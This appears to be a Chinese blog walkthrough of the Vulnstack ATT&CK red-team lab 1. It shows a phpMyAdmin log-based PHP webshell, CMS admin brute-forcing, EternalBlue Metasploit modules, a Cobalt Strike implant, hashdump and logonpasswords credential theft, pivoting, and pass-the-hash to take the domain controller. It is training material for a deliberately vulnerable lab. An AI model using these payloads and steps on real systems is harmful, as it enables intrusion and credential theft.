ATT&CK红队评估实战靶场(1)思路

ATT&CK红队评估实战靶场(1)思路

靶场链接

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

一、环境说明

1.1 拓扑结构

在这里插入图片描述

1.2 靶机环境

靶机环境:

Win7:

外网IP:172.16.27.163
内网IP:192.168.52.143
PassWD:hongrisec@2020

Win2003:

IP:192.168.52.141
PassWD:hongrisec@2020

Win2008:

IP:192.168.52.138
PassWD:hongrisec@2021

攻击机:

Macos:172.16.27.1
KaliLinux:172.16.27.138

1.3 环境启动

启动Win7下的 PHPStudy 开启Web服务

PHPStudy 安装路径:C:\phpStudy

在这里插入图片描述

二、信息收集

2.1 探测存活主机IP

利用 Nmap 扫描172.16.27.1/24这个段存活的IP主机

nmap -sP 172.16.27.1/24

在这里插入图片描述
发现存活主机:172.16.27.163

2.2 端口扫描

已知 172.16.27.163 这个IP为我们的目标 IP,接下来我们进行端口扫描看一下这个 IP 上开了哪些服务

nmap -sC -sV -Pn -p 1-65535 172.16.27.163

-sC:等价于 --script=default,使用默认类别的脚本进行扫描。

-sV:指定让Nmap进行版本侦测

-Pn:将所有指定的主机视作开启的,跳过主机发现的过程

-p:指定端口

在这里插入图片描述

2.3 目录扫描

通过扫描 IP 端口发现 80 端口为 Open 状态,打开发现为默认页面 Hello Word

在这里插入图片描述
使用 dirsearch 进行目录扫描

在这里插入图片描述

三、漏洞利用

3.1 Phpmyadmin后台Getshell

在目录扫描阶段发现根目录有 Phpmyadmin 目录,打开尝试弱口令登陆 root/root,可以成功登陆后台

在这里插入图片描述
尝试利用全局日志来 getshel

在这里插入图片描述
修改 general log 为 ON 状态

修改 general log file 地址为网站根目录 C:\phpStudy\PHPTutorial\WWW\shell.php

写入一句话到 shell.php 文件

执行 Sql 语句 SELECT '<?php eval($_POST["cmd"]);?>'

在这里插入图片描述

使用蚁剑进行连接 Webshell

在这里插入图片描述

3.2 yxcms后台拿shell

通过目录扫描发现网站根目录还有一个 yxcms 目录,打开发现网站使用的是 yxcms 模板

百度搜索此模板,发现后台地址为 index.php?r=admin/index/login
在这里插入图片描述
经过尝试弱口令发现验证码可以重复利用,那我们使用burp来爆破一下后台密码

在这里插入图片描述

爆破成功,密码为 123456,尝试登陆后台

在这里插入图片描述

在前台模板处添加模板写入webshell

在这里插入图片描述

默认地址为 http://172.16.27.163/yxcms/protected/apps/default/view/default/shellx.php

在这里插入图片描述

3.3 ms17-010

在前面进行端口扫描的时候我们发现这此 IP 开放了 135、455高危端口,扫描一下看是否存在 MS17-010 漏洞

在这里插入图片描述
使用 MSF 来进行利用

在这里插入图片描述
use exploit/windows/smb/ms17_010_eternalblue

set rhosts 172.16.27.163

在这里插入图片描述
成功利用

在这里插入图片描述

四、内网渗透

4.1 Cobalt Strike上线

启动服务端 sudo ./teamserver 172.16.27.138 password

在这里插入图片描述
本地启动客户端进行连接

在这里插入图片描述

生成木马文件

在这里插入图片描述
并上传到网站根目录

在这里插入图片描述
等待 CS 上线

在这里插入图片描述

4.2 内网信息收集

查看网关:shell ipconfig/all

在这里插入图片描述
在这里插入图片描述
发现内网IP地址:

外网IP:172.16.27.163
内网IP:192.168.52.143

查看当前计算机名,全名,用户名,系统版本,工作站域,登陆域 shell net config Workstation

在这里插入图片描述
查看局域网内所有计算机 shell net view

在这里插入图片描述
可以看到除了Web这台主机外还有两台主机,主机名分别为:OWA、ROOT-TVI862UBEH

查看系统信息:shell systeminfo

在这里插入图片描述
可以进一步确定当前域是 god.org 并且域服务器的计算机名是 OWA

4.3 主机密码收集

获取hash:hashdump

在这里插入图片描述
获取明文密码:logonpasswords

在这里插入图片描述

4.5 Ladon扫描内网存活PC

使用 CS 插件 Ladon 进行内网主机探测扫描 Ladon 192.168.52.1/24 OnlinePC

在这里插入图片描述
内网中还存活着两台主机分别是

域控:192.168.52.138 OWA

域成员:192.168.52.141 ROOT-TVI862UBEH

4.4 提权

将当前用户的权限提升至 system 权限

在这里插入图片描述
等待提权成功上线 CS

在这里插入图片描述

五、横向移动

5.1 Cobalt Strike联动 MSF

新建一个 CS 监听器

在这里插入图片描述
然后运行 MSF
use exploit/multi/handler
set payload windows/meterpreter/reverse_http

在这里插入图片描述
设置参数

在这里插入图片描述
在 CS 上右键目标选择增加会话

在这里插入图片描述

选择刚新增的监听器

在这里插入图片描述
静等 MSF 上线

在这里插入图片描述

5.2 内网主机端口扫描

获取安装软件信息:run post/winmdows/gather/enum_applications

在这里插入图片描述
发现当前主机(Win7)安装了Nmap

直接利用这台主机上的工具来进行内网主机的端口扫描

shell nmap -Pn -sT -p 1-1000 192.168.52.141

-Pn:将所有指定的主机视作开启的,跳过主机发现的过程
-sT:TCP扫描
-p:指定端口

192.168.52.141 主机端口

在这里插入图片描述
192.168.52.138 主机端口

在这里插入图片描述

5.3 内网主机漏洞探测

使用 nmap 进行主机漏洞扫描,查看是否存在一些常见的漏洞

shell nmap --script=vuln 192.168.52.141
192.168.52.141 漏洞探测情况:
在这里插入图片描述
存在ms08-067、ms17-010 漏洞

shell nmap --script=vuln 192.168.52.138
192.168.52.138 漏洞探测情况:
在这里插入图片描述
存在 ms17-010

5.4 漏洞利用

查看当前网段 run get_local_subnets

在这里插入图片描述
添加路由 run autoroute -s 192.168.52.0/24

在这里插入图片描述
设置代理 use auxiliary/server/socks_proxy

在这里插入图片描述

5.4.1 ms17-010漏洞利用

使用 MSF 模块
exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp

在这里插入图片描述
设置参数 set rhosts 192.168.52.141

在这里插入图片描述

利用成功

在这里插入图片描述
域控那台主机可能因为防火墙限制无法正常利用 ms17-010 漏洞

5.5 PTH获取域控权限

Pass-The-Hash 内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。

Pass The Hash原理:

  • 在Windows系统中,通常会使用NTLM身份认证
  • NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser)
  • hash分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash。从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash
  • 如果攻击者获得了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)

新建一个监听器

在这里插入图片描述
点击探测到的域控主机执行Jump > psexec

在这里插入图片描述
选择刚刚新建的监听器

在这里插入图片描述
点击开始之后等会就可以收到域控主机的 shell

在这里插入图片描述

成功拿下域控服务器

获取一下域控服务器明文密码 logonpasswords

在这里插入图片描述
Ps:Win2003那台机器也可以使用这个方法来获取 Shell

最后截图
在这里插入图片描述
在这里插入图片描述

ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK红队评估(红日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值